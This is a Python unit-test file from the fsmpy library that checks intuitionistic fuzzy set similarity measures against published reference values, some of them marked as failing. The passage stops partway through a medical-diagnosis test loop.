[
"BSD-3-Clause"
] | 1
|
2022-01-31T07:01:59.000Z
|
2022-01-31T07:01:59.000Z
|
fsmpy/tests/test_similarities.py
|
GCidd/fsmpy
|
131e81925481b3fe608f2c1945bbb00a8b674e72
|
[
"BSD-3-Clause"
] | null | null | null |
fsmpy/tests/test_similarities.py
|
GCidd/fsmpy
|
131e81925481b3fe608f2c1945bbb00a8b674e72
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.testing import assert_equal
from fsmpy.datasets import load_patients_diagnoses
from fsmpy.sets import IntuitionisticFuzzySet
from fsmpy.similarities import chen_1, hung_yang_4, hung_yang_3, hung_yang_2, hwang_yang, park_kwun_lim, ye, hung_yang_1, julian_hung_lin, zhang_fu
from fsmpy.similarities import mitchell, iancu, liang_shi, dengfeng_chuntian, hong_kim, chen_cheng_lan, song_wang_lei_xue
from fsmpy.similarities import liu, chen_2
from fsmpy.similarities import dengfeng_chuntian, hong_kim, song_wang_lei_xue, muthukumar_krishnanb, nguyen, deng_jiang_fu
from fsmpy import LIANG_SHI_SIMILARITY_1, LIANG_SHI_SIMILARITY_2, LIANG_SHI_SIMILARITY_3
from fsmpy import HUNG_YANG_3_SIMILARITY_1, HUNG_YANG_3_SIMILARITY_2, HUNG_YANG_3_SIMILARITY_3, \
HUNG_YANG_3_SIMILARITY_4, HUNG_YANG_3_SIMILARITY_5, HUNG_YANG_3_SIMILARITY_6, HUNG_YANG_3_SIMILARITY_7
from fsmpy import DENG_JIANG_FU_MONOTONIC_TYPE_1_1, DENG_JIANG_FU_MONOTONIC_TYPE_1_2, \
DENG_JIANG_FU_MONOTONIC_TYPE_1_3, DENG_JIANG_FU_MONOTONIC_TYPE_1_4, DENG_JIANG_FU_MONOTONIC_TYPE_2_1, \
DENG_JIANG_FU_MONOTONIC_TYPE_2_2, DENG_JIANG_FU_MONOTONIC_TYPE_2_3, DENG_JIANG_FU_MONOTONIC_TYPE_2_4, \
DENG_JIANG_FU_MONOTONIC_TYPE_3_1, DENG_JIANG_FU_MONOTONIC_TYPE_3_2, DENG_JIANG_FU_MONOTONIC_TYPE_3_3
from fsmpy import IANCU_SIMILARITY_1, IANCU_SIMILARITY_2, IANCU_SIMILARITY_3, IANCU_SIMILARITY_4, \
IANCU_SIMILARITY_5, IANCU_SIMILARITY_6, IANCU_SIMILARITY_7, IANCU_SIMILARITY_8, IANCU_SIMILARITY_9, \
IANCU_SIMILARITY_10, IANCU_SIMILARITY_11, IANCU_SIMILARITY_12, IANCU_SIMILARITY_13, IANCU_SIMILARITY_14,\
IANCU_SIMILARITY_15, IANCU_SIMILARITY_16, IANCU_SIMILARITY_17, IANCU_SIMILARITY_18, IANCU_SIMILARITY_19, \
IANCU_SIMILARITY_20
def test_dengfeng_chuntian():
    """Check dengfeng_chuntian against the reference values of Example 1."""
    # Example 1
    A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
    A2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
    A3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
    B = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])

    # p=1, unweighted
    for fuzzy_set, expected in ((A1, 0.78), (A3, 0.85)):
        assert_almost_equal(dengfeng_chuntian(fuzzy_set, B, p=1, weights=None), expected, decimal=2)
    # assert_almost_equal(dengfeng_chuntian(A2, B, p=1, weights=None), 0.80, decimal=2) # fails

    # p=2, unweighted
    for fuzzy_set, expected in ((A1, 0.74), (A2, 0.78), (A3, 0.84)):
        assert_almost_equal(dengfeng_chuntian(fuzzy_set, B, p=2, weights=None), expected, decimal=2)

    # p=2, weighted
    for fuzzy_set, expected in ((A1, 0.696), (A3, 0.853)):
        assert_almost_equal(dengfeng_chuntian(fuzzy_set, B, p=2, weights=[0.5, 0.3, 0.2]), expected, decimal=3)
    # assert_almost_equal(dengfeng_chuntian(A2, B, p=2, weights=[0.5, 0.3, 0.2]), 0.779, decimal=3)
def test_liang_shi():
    """Check liang_shi similarity types 1-3 against the reference values."""
    candidates = (
        IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.9, 0.9, 0.1]),
        IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.7, 0.2]),
        IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.8, 0.2, 0.6]),
    )
    sample = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.6, 0.8, 0.2])
    # Example 1
    for fuzzy_set, expected in zip(candidates, (0.83, 0.93, 0.60)):
        assert_almost_equal(liang_shi(fuzzy_set, sample, similarity_type=LIANG_SHI_SIMILARITY_1, p=1), expected, decimal=2)
    # Example 2 # fails
    for fuzzy_set, expected in zip(candidates, (0.92, 0.97, 0.77)):
        assert_almost_equal(liang_shi(fuzzy_set, sample, similarity_type=LIANG_SHI_SIMILARITY_2, p=1), expected, decimal=2)
    # Example 3
    omegas = [1.0 / 3.0, 1.0 / 3.0, 1.0 / 3.0]
    for fuzzy_set, expected in zip(candidates, (0.89, 0.95, 0.72)):
        assert_almost_equal(liang_shi(fuzzy_set, sample, similarity_type=LIANG_SHI_SIMILARITY_3, p=1, omegas=omegas), expected, decimal=2)
def test_park_kwun_lin():
    """Check park_kwun_lim against the three reference values."""
    sample = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.7, 0.8, 0.7])
    cases = (
        (IntuitionisticFuzzySet([0.2, 0.1, 0.0], [0.6, 0.7, 0.6]), 0.800),
        (IntuitionisticFuzzySet([0.2, 0.0, 0.2], [0.6, 0.6, 0.8]), 0.733),
        (IntuitionisticFuzzySet([0.1, 0.2, 0.2], [0.5, 0.7, 0.8]), 0.767),
    )
    for fuzzy_set, expected in cases:
        assert_almost_equal(park_kwun_lim(fuzzy_set, sample), expected, decimal=3)
def test_mitchell():
    # NOTE(review): this test is incomplete — the sets below are prepared
    # but mitchell() is never called and nothing is asserted; reference
    # values still need to be added.
    set_1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
    set_2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
    set_3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
    sample = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
def test_julian_hung_lin():
    """Placeholder: no reference values for julian_hung_lin yet."""
    pass
def test_hung_yang_1():
    """Check hung_yang_1 (default, 'c' and 'e' variants) on three examples."""
    # Example 1
    set_1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
    set_2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
    set_3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
    sample = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
    assert_almost_equal(hung_yang_1(set_1, sample), 1.00, decimal=2)
    assert_almost_equal(hung_yang_1(set_2, sample), 0.933, decimal=3)
    assert_almost_equal(hung_yang_1(set_3, sample), 0.800, decimal=3)
    assert_almost_equal(hung_yang_1(set_1, sample, similarity_type='c'), 1.00, decimal=2)
    assert_almost_equal(hung_yang_1(set_2, sample, similarity_type='c'), 0.875, decimal=3)
    assert_almost_equal(hung_yang_1(set_3, sample, similarity_type='c'), 0.667, decimal=3)
    assert_almost_equal(hung_yang_1(set_1, sample, similarity_type='e'), 1.00, decimal=2)
    assert_almost_equal(hung_yang_1(set_2, sample, similarity_type='e'), 0.898, decimal=3)
    assert_almost_equal(hung_yang_1(set_3, sample, similarity_type='e'), 0.713, decimal=3)
    # Example 2
    set_1 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.3, 0.3, 0.3])
    set_2 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
    sample = IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3])
    assert_almost_equal(hung_yang_1(set_1, sample), 0.900, decimal=3)
    assert_almost_equal(hung_yang_1(set_2, sample), 0.833, decimal=3)
    assert_almost_equal(hung_yang_1(set_1, sample, similarity_type='c'), 0.818, decimal=3)
    assert_almost_equal(hung_yang_1(set_2, sample, similarity_type='c'), 0.714, decimal=3)
    assert_almost_equal(hung_yang_1(set_1, sample, similarity_type='e'), 0.849, decimal=3)
    assert_almost_equal(hung_yang_1(set_2, sample, similarity_type='e'), 0.757, decimal=3)
    # Example 3
    set_1 = IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.9, 0.9, 0.1])
    set_2 = IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.7, 0.2])
    set_3 = IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.8, 0.2, 0.6])
    sample = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.6, 0.8, 0.2])
    assert_almost_equal(hung_yang_1(set_1, sample), 0.833, decimal=3)
    assert_almost_equal(hung_yang_1(set_2, sample), 0.933, decimal=3)
    assert_almost_equal(hung_yang_1(set_3, sample), 0.567, decimal=3)
    assert_almost_equal(hung_yang_1(set_1, sample, similarity_type='c'), 0.714, decimal=2)
    assert_almost_equal(hung_yang_1(set_2, sample, similarity_type='c'), 0.875, decimal=3)
    assert_almost_equal(hung_yang_1(set_3, sample, similarity_type='c'), 0.395, decimal=3)
    assert_almost_equal(hung_yang_1(set_1, sample, similarity_type='e'), 0.757, decimal=3)
    assert_almost_equal(hung_yang_1(set_2, sample, similarity_type='e'), 0.898, decimal=3)
    assert_almost_equal(hung_yang_1(set_3, sample, similarity_type='e'), 0.444, decimal=3)
def test_ye():
    """Check ye on Example 1 and on the medical-diagnosis example."""
    # Example 1
    patterns = (
        IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1]),
        IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0]),
        IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0]),
    )
    sample = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
    for pattern, expected in zip(patterns, (0.9353, 0.9519, 0.9724)):
        assert_almost_equal(ye(pattern, sample), expected, decimal=4)
    for pattern, expected in zip(patterns, (0.9133, 0.9404, 0.9712)):
        assert_almost_equal(ye(pattern, sample, weights=[0.5, 0.3, 0.2]), expected, decimal=4)

    # Medical-diagnosis example: patient symptoms vs. each candidate diagnosis.
    diagnoses = (
        (IntuitionisticFuzzySet([0.4, 0.3, 0.1, 0.4, 0.1], [0.0, 0.5, 0.7, 0.3, 0.7]), 0.9046),  # viral fever
        (IntuitionisticFuzzySet([0.7, 0.2, 0.0, 0.7, 0.1], [0.0, 0.6, 0.9, 0.0, 0.8]), 0.8602),  # malaria - fails
        (IntuitionisticFuzzySet([0.3, 0.6, 0.2, 0.2, 0.1], [0.3, 0.1, 0.7, 0.6, 0.9]), 0.8510),  # typhoid
        (IntuitionisticFuzzySet([0.1, 0.2, 0.8, 0.2, 0.2], [0.7, 0.4, 0.0, 0.7, 0.7]), 0.5033),  # stomach problem
        (IntuitionisticFuzzySet([0.1, 0.0, 0.2, 0.2, 0.8], [0.8, 0.8, 0.8, 0.8, 0.1]), 0.4542),  # chest problem - fails
    )
    patient = IntuitionisticFuzzySet([0.8, 0.6, 0.2, 0.6, 0.1], [0.1, 0.1, 0.8, 0.1, 0.6])
    for diagnosis, expected in diagnoses:
        assert_almost_equal(ye(patient, diagnosis), expected, decimal=4)
def test_hwang_yang():
    """Check hwang_yang on the six single-element pairs of Example 1."""
    # Example 1: ((mu_a, nu_a), (mu_b, nu_b), expected)
    cases = (
        (([0.3], [0.3]), ([0.4], [0.4]), 0.997),  # fails
        (([0.3], [0.4]), ([0.4], [0.3]), 0.859),
        (([1.0], [0.0]), ([0.0], [0.0]), 0.902),
        (([0.5], [0.5]), ([0.0], [0.0]), 0.902),
        (([0.4], [0.2]), ([0.5], [0.3]), 0.995),
        (([0.4], [0.2]), ([0.5], [0.2]), 0.997),
    )
    for (mu_a, nu_a), (mu_b, nu_b), expected in cases:
        first = IntuitionisticFuzzySet(mu_a, nu_a)
        second = IntuitionisticFuzzySet(mu_b, nu_b)
        assert_almost_equal(hwang_yang(first, second), expected, decimal=3)
def test_hung_yang_2():
    """Check hung_yang_2 (default, 'c' and 'e' variants) on three examples."""
    # Example 1 (sets carry an explicit hesitation component)
    set_1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1], [0.4, 0.6, 0.8])
    set_2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2], [0.6, 0.6, 0.6])
    set_3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4], [0.2, 0.2, 0.2])
    sample = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1], [0.4, 0.6, 0.8])
    assert_almost_equal(hung_yang_2(set_1, sample), 1.00, decimal=2)
    assert_almost_equal(hung_yang_2(set_2, sample), 0.979, decimal=3)
    assert_almost_equal(hung_yang_2(set_3, sample), 0.854, decimal=3)
    assert_almost_equal(hung_yang_2(set_1, sample, similarity_type='c'), 1.00, decimal=2)
    assert_almost_equal(hung_yang_2(set_2, sample, similarity_type='c'), 0.964, decimal=3)
    assert_almost_equal(hung_yang_2(set_3, sample, similarity_type='c'), 0.776, decimal=3)
    assert_almost_equal(hung_yang_2(set_1, sample, similarity_type='e'), 1.00, decimal=2)
    assert_almost_equal(hung_yang_2(set_2, sample, similarity_type='e'), 0.971, decimal=3)
    assert_almost_equal(hung_yang_2(set_3, sample, similarity_type='e'), 0.808, decimal=3)
    # Example 2
    set_1 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2], [0.6, 0.6, 0.6])
    set_2 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4], [0.2, 0.2, 0.2])
    sample = IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3], [0.4, 0.4, 0.6])
    assert_almost_equal(hung_yang_2(set_1, sample), 0.974, decimal=3)
    assert_almost_equal(hung_yang_2(set_2, sample), 0.928, decimal=3)
    assert_almost_equal(hung_yang_2(set_1, sample, a=1.5), 0.974, decimal=3)
    assert_almost_equal(hung_yang_2(set_2, sample, a=1.5), 0.928, decimal=3)
    assert_almost_equal(hung_yang_2(set_1, sample, similarity_type='c'), 0.957, decimal=3)
    assert_almost_equal(hung_yang_2(set_2, sample, similarity_type='c'), 0.882, decimal=3)
    assert_almost_equal(hung_yang_2(set_1, sample, similarity_type='e'), 0.964, decimal=3)
    assert_almost_equal(hung_yang_2(set_2, sample, similarity_type='e'), 0.901, decimal=3)
    # Example 3 Division with zero
    set_1 = IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.1, 0.1, 0.9], [0.8, 0.4, 0.0])
    set_2 = IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.3, 0.8], [0.0, 0.0, 0.2])
    set_3 = IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.2, 0.8, 0.4], [0.1, 0.1, 0.2])
    sample = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.4, 0.2, 0.8], [0.2, 0.2, 0.2])
    assert_almost_equal(hung_yang_2(set_1, sample), 0.843, decimal=3)
    assert_almost_equal(hung_yang_2(set_2, sample), 0.927, decimal=3)
    assert_almost_equal(hung_yang_2(set_3, sample), 0.797, decimal=3)
    assert_almost_equal(hung_yang_2(set_1, sample, similarity_type='c'), 0.761, decimal=2)
    assert_almost_equal(hung_yang_2(set_2, sample, similarity_type='c'), 0.883, decimal=3)
    assert_almost_equal(hung_yang_2(set_3, sample, similarity_type='c'), 0.698, decimal=3)
    assert_almost_equal(hung_yang_2(set_1, sample, similarity_type='e'), 0.794, decimal=3)
    assert_almost_equal(hung_yang_2(set_2, sample, similarity_type='e'), 0.902, decimal=3)
    assert_almost_equal(hung_yang_2(set_3, sample, similarity_type='e'), 0.737, decimal=3)
def test_zhang_fu():
    """Check zhang_fu against the four reference patterns of Example 1."""
    # Example 1
    sample = IntuitionisticFuzzySet([0.3, 0.4, 0.6, 0.5, 0.9], [0.5, 0.4, 0.2, 0.1, 0.0])
    patterns = (
        (IntuitionisticFuzzySet([0.4, 0.3, 0.5, 0.5, 0.6], [0.4, 0.3, 0.1, 0.2, 0.2]), 0.884),
        (IntuitionisticFuzzySet([0.2, 0.3, 0.2, 0.7, 0.8], [0.6, 0.5, 0.3, 0.1, 0.0]), 0.870),
        (IntuitionisticFuzzySet([0.1, 0.0, 0.2, 0.1, 0.2], [0.9, 1.0, 0.7, 0.8, 0.8]), 0.449),
        (IntuitionisticFuzzySet([0.8, 0.9, 1.0, 0.7, 0.6], [0.2, 0.0, 0.0, 0.2, 0.4]), 0.671),
    )
    for pattern, expected in patterns:
        assert_almost_equal(zhang_fu(sample, pattern), expected, decimal=3)
def test_hung_yang_3():
    """Check all seven hung_yang_3 similarity variants on Example 1."""
    # Example 1
    candidates = (
        IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1]),
        IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2]),
        IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4]),
    )
    sample = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
    # (variant, expected values per candidate); trailing numbers are the
    # equation numbers noted in the original test.
    expectations = (
        (HUNG_YANG_3_SIMILARITY_1, (1.000, 0.722, 0.500)),  # 8
        (HUNG_YANG_3_SIMILARITY_2, (1.000, 0.900, 0.700)),  # 11
        (HUNG_YANG_3_SIMILARITY_3, (1.000, 0.714, 0.500)),  # 10
        (HUNG_YANG_3_SIMILARITY_4, (1.000, 0.714, 0.500)),  # 2nd/3rd fail
        (HUNG_YANG_3_SIMILARITY_5, (1.000, 0.833, 0.667)),  # 12
        (HUNG_YANG_3_SIMILARITY_6, (1.000, 0.809, 0.525)),  # 13
        (HUNG_YANG_3_SIMILARITY_7, (1.000, 0.783, 0.533)),  # 14
    )
    for variant, expected_values in expectations:
        for fuzzy_set, expected in zip(candidates, expected_values):
            assert_almost_equal(hung_yang_3(fuzzy_set, sample, similarity_type=variant), expected, decimal=3)
def test_chen_1():
    """Check chen_1 with attribute weights against the reference value."""
    first = IntuitionisticFuzzySet([0.1, 0.2, 0.4, 0.6, 0.8], [0.3, 0.6, 0.8, 0.8, 1.0])
    second = IntuitionisticFuzzySet([0.2, 0.3, 0.5, 0.7, 0.9], [0.5, 0.7, 0.8, 0.9, 1.0])
    result = chen_1(first, second, weights=[0.5, 0.8, 1.0, 0.7, 1.0])
    assert_almost_equal(result, 0.90625, decimal=5)
def test_hung_yang_4():
    """Check hung_yang_4 (default, 'c' and 'e' variants, p=2) on three examples."""
    def check(candidates, sample, expected_by_variant):
        # expected_by_variant: (extra kwargs, expected value per candidate)
        for extra_kwargs, expected_values in expected_by_variant:
            for fuzzy_set, expected in zip(candidates, expected_values):
                assert_almost_equal(hung_yang_4(fuzzy_set, sample, p=2, **extra_kwargs), expected, decimal=3)

    # Example 1
    check(
        (
            IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1]),
            IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2]),
            IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4]),
        ),
        IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1]),
        (
            ({}, (1.000, 0.933, 0.800)),
            ({"similarity_type": 'c'}, (1.000, 0.853, 0.624)),
            ({"similarity_type": 'e'}, (1.000, 0.881, 0.675)),
        ),
    )
    # Example 2
    check(
        (
            IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.1, 0.1, 0.9]),
            IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.3, 0.8]),
            IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.2, 0.8, 0.4]),
        ),
        IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.4, 0.2, 0.8]),
        (
            ({}, (0.833, 0.933, 0.598)),
            ({"similarity_type": 'c'}, (0.674, 0.853, 0.381)),
            ({"similarity_type": 'e'}, (0.723, 0.881, 0.427)),
        ),
    )
    # Example 3
    check(
        (
            IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2]),
            IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4]),
        ),
        IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3]),
        (
            ({}, (0.900, 0.859)),
            ({"similarity_type": 'c'}, (0.788, 0.716)),
            ({"similarity_type": 'e'}, (0.826, 0.761)),
        ),
    )
def test_hong_kim():
    """Check hong_kim (unweighted) against the reference value of Example 1."""
    # Example 1
    first = IntuitionisticFuzzySet([0.8, 0.3, 0.4], [0.9, 0.5, 0.6])
    second = IntuitionisticFuzzySet([0.9, 0.0, 0.8], [0.9, 0.0, 0.9])
    assert_almost_equal(hong_kim(first, second, weights=None), 0.7333, decimal=4)
def test_chen_2():
    """Check chen_2 (unweighted) against the reference value of Example 1."""
    # Example 1
    first = IntuitionisticFuzzySet([0.8, 0.3, 0.4], [0.9, 0.5, 0.6])
    second = IntuitionisticFuzzySet([0.9, 0.0, 0.8], [0.9, 0.0, 0.9])
    assert_almost_equal(chen_2(first, second, weights=None), 0.7333, decimal=4)
def test_liu():
    """Check liu (p=2) against the three reference values."""
    sample = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1], [0.2, 0.2, 0.1])
    cases = (
        (IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2]), 0.72),
        (IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0], [0.1, 0.0, 0.1]), 0.74),
        (IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0], [0.2, 0.2, 0.0]), 0.84),
    )
    for fuzzy_set, expected in cases:
        assert_almost_equal(liu(fuzzy_set, sample, p=2), expected, decimal=2)
def test_iancu():
    """Check several iancu similarity variants on two examples."""
    # Example 1
    set_1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
    set_2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
    set_3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
    sample = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
    # Variants 1 and 2 give 1.000 for every candidate.
    for variant in (IANCU_SIMILARITY_1, IANCU_SIMILARITY_2):
        for fuzzy_set in (set_1, set_2, set_3):
            assert_almost_equal(iancu(fuzzy_set, sample, similarity_type=variant), 1.000, decimal=3)
    # fail
    for variant in (IANCU_SIMILARITY_9, IANCU_SIMILARITY_10):
        for fuzzy_set, expected in zip((set_1, set_2, set_3), (1.000, 0.938, 0.833)):
            assert_almost_equal(iancu(fuzzy_set, sample, similarity_type=variant), expected, decimal=3)
    # Second example
    set_1 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
    set_2 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
    sample = IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3])
    assert_almost_equal(iancu(set_1, sample), 0.933, decimal=3)
    assert_almost_equal(iancu(set_2, sample), 0.933, decimal=3)
    assert_almost_equal(iancu(set_1, sample, similarity_type=IANCU_SIMILARITY_7), 0.938, decimal=3)  # fails
    assert_almost_equal(iancu(set_2, sample, similarity_type=IANCU_SIMILARITY_7), 0.938, decimal=3)
def test_song_wang_lei_xue():
    """Check song_wang_lei_xue, unweighted and weighted, on Example 1."""
    # Example 1
    candidates = (
        IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2]),
        IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0], [0.1, 0.0, 0.1]),
        IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0], [0.2, 0.2, 0.0]),
    )
    sample = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1], [0.2, 0.2, 0.1])
    for fuzzy_set, expected in zip(candidates, (0.887, 0.913, 0.936)):
        assert_almost_equal(song_wang_lei_xue(fuzzy_set, sample), expected, decimal=3)
    for fuzzy_set, expected in zip(candidates, (0.853, 0.919, 0.949)):
        assert_almost_equal(song_wang_lei_xue(fuzzy_set, sample, weights=[0.5, 0.3, 0.2]), expected, decimal=3)
def test_deng_jiang_fu():
    """Check the Deng-Jiang-Fu monotonic similarity measures.

    Example 2 compares three candidate sets against a common reference for
    every monotonic similarity type; Example 3 repeats the sweep for each
    (patient, diagnosis) pair of the medical-diagnosis data set.
    """
    # Each entry pairs a similarity type with the extra keyword arguments
    # its formula requires; the order matches the expected-value tables below.
    variants = (
        (DENG_JIANG_FU_MONOTONIC_TYPE_1_1, {}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_1_2, {}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_1_3, {'p': 1}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_2_1, {}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_2_2, {}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_2_3, {'p': 1}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_2_4, {}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_3_1, {'p': 1}),  # marked "fails" in the original test
        (DENG_JIANG_FU_MONOTONIC_TYPE_3_2, {'p': 2, 'u': 0.5, 'v': 0.5}),
        (DENG_JIANG_FU_MONOTONIC_TYPE_3_3, {'p': 1}),
    )
    # Example 2
    A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
    A2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
    A3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
    B = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
    # One row per similarity type (same order as `variants`); one column
    # per candidate set A1, A2, A3.
    example_2_expected = (
        (0.489, 0.458, 0.546),
        (0.454, 0.444, 0.541),
        (0.625, 0.615, 0.702),
        (0.681, 0.668, 0.745),
        (0.658, 0.658, 0.743),
        (0.783, 0.783, 0.850),
        (0.644, 0.644, 0.739),
        (0.593, 0.593, 0.700),  # TYPE_3_1 row, marked "fails" in the original test
        (0.928, 0.941, 0.975),
        (0.667, 0.667, 0.766),
    )
    for (similarity, kwargs), row in zip(variants, example_2_expected):
        for candidate, expected in zip((A1, A2, A3), row):
            assert_almost_equal(deng_jiang_fu(candidate, B, similarity, **kwargs),
                                expected, decimal=3)
    # Example 3
    diagnoses, patients = load_patients_diagnoses()
    # One row per (patient, diagnosis) pair — patient-major, diagnoses in the
    # order returned by load_patients_diagnoses (viral fever, malaria, typhoid,
    # stomach problem, chest problem); one column per variant.
    example_3_expected = (
        # al
        (0.467, 0.437, 0.608, 0.698, 0.683, 0.81, 0.681, 0.634, 0.947, 0.706),
        (0.517, 0.489, 0.657, 0.709, 0.69, 0.82, 0.695, 0.65, 0.946, 0.721),
        (0.544, 0.474, 0.643, 0.698, 0.661, 0.8, 0.667, 0.619, 0.92, 0.691),
        (0.216, 0.186, 0.313, 0.393, 0.361, 0.54, 0.37, 0.304, 0.736, 0.339),
        (0.26, 0.184, 0.311, 0.375, 0.324, 0.5, 0.333, 0.269, 0.678, 0.293),
        # bob
        (0.348, 0.28, 0.437, 0.518, 0.476, 0.67, 0.504, 0.441, 0.831, 0.508),
        (0.3, 0.21, 0.348, 0.419, 0.352, 0.54, 0.37, 0.304, 0.694, 0.34),
        (0.415, 0.366, 0.536, 0.594, 0.567, 0.74, 0.587, 0.531, 0.898, 0.605),
        (0.641, 0.635, 0.777, 0.826, 0.825, 0.9, 0.818, 0.79, 0.986, 0.844),
        (0.371, 0.309, 0.472, 0.509, 0.463, 0.64, 0.471, 0.406, 0.802, 0.464),
        # joe
        (0.363, 0.348, 0.516, 0.618, 0.603, 0.75, 0.6, 0.545, 0.915, 0.617),
        (0.344, 0.308, 0.471, 0.533, 0.492, 0.68, 0.515, 0.453, 0.844, 0.52),
        (0.498, 0.47, 0.639, 0.712, 0.7, 0.82, 0.695, 0.65, 0.944, 0.721),
        (0.32, 0.241, 0.388, 0.512, 0.452, 0.6, 0.429, 0.363, 0.762, 0.415),
        (0.277, 0.214, 0.353, 0.449, 0.387, 0.54, 0.37, 0.304, 0.7, 0.34),
        # ted
        (0.407, 0.403, 0.574, 0.672, 0.672, 0.8, 0.667, 0.619, 0.954, 0.691),
        (0.421, 0.401, 0.572, 0.624, 0.61, 0.77, 0.626, 0.574, 0.927, 0.648),
        (0.318, 0.31, 0.474, 0.541, 0.532, 0.71, 0.55, 0.491, 0.897, 0.561),
        (0.264, 0.243, 0.391, 0.481, 0.464, 0.63, 0.46, 0.395, 0.829, 0.451),
        (0.198, 0.189, 0.319, 0.376, 0.366, 0.55, 0.379, 0.314, 0.773, 0.351),
    )
    for pair_index, row in enumerate(example_3_expected):
        patient = patients[pair_index // len(diagnoses)]
